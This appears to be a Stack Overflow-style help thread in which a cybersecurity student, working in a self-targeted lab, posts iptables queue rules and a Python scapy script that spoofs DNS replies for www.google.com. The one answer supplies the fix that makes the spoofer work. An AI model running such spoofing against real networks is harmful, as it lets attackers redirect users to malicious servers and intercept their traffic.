0

I've been following a course on Cybersecurity and I'm currently trying to make a DNS spoofer work. The idea is that each time the target (this same computer) tries to go to www.google.com it goes to the apache server instead. But the only thing it does is not connect to Google. Suffice to say, I have little experience.

I start by:

iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0

Then on Python 3.7

import netfilterqueue
import scapy.all as scapy

def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.DNSRR):
        qname = scapy_packet[scapy.DNSQR].qname
        if b'www.google.com' in qname:
            answer = scapy.DNSRR(rrname=qname, rdata=b'10.0.2.5')
            scapy_packet[scapy.DNS].an = answer
            scapy_packet[scapy.DNS].ancount = 1
            del scapy_packet[scapy.IP].len
            del scapy_packet[scapy.IP].chksum
            del scapy_packet[scapy.UDP].len
            del scapy_packet[scapy.UDP].chksum
            packet.set_payload(b'scapy_packet')
    packet.accept()

queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()

I'm using a NAT network and 10.0.2.5 is my apache server.

SSeb
  • 7
  • 3
  • What's your **specific** question? – Klaus D. Mar 15 '20 at 23:25
  • That would be "What am I doing wrong?". When I go to 10.0.2.5 on the browser it doesn't redirect to the apache server. If I ping Google, it says: "ping: www.google.com: Temporary failure in name resolution", whereas as I understand it, it should give me my server address 10.0.2.5 – SSeb Mar 17 '20 at 15:10
  • What error are you getting? Perhaps your browser firewall is blocking the connection? – mikal Jun 02 '20 at 18:54

1 Answers1

-1

Maybe replace:

packet.set_payload(b'scapy_packet')

with:

packet.set_payload(bytes(scapy_packet))
RiveN
  • 2,595
  • 11
  • 13
  • 26
Nicolas LOFFREDO
  • 1